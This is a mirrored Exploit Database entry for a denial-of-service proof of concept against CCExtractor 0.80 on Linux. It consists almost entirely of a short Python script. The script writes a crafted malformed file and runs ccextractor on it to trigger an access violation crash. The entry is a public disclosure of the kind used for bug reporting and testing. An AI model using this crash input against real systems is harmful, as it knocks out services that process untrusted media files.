CCextractor 0.80 – Crash (PoC)

• Exploit Database
• 105 阅读

• 作者： David Silveiro
  日期： 2016-05-31
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39873/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: CCextractor 0.80 Access Violation Crash # Date: 31st May 2016 # Exploit Author: David Silveiro (Xino.co.uk) # Vendor Homepage: http://www.ccextractor.org/ # Software Link: http://www.ccextractor.org/download-ccextractor.html # Version: 0.80 # Tested on: Ubuntu 14 LTS # CVE : 0 day   from subprocess import call from shlex import split from time import sleep     def crash():   command = './ccextractor crash'   buffer = '\x00\x00\x00\x04ssixssixs'   with open('crash', 'w+b') as file: file.write(buffer)   try: call(split(command)) print("Exploit successful! ")   except: print("Error: Something has gone wrong!")     def main():   print("Author: David Silveiro ") print(" CCextractor 0.80 Access Violation Crash ")   sleep(2)   crash()   if __name__ == "__main__": main()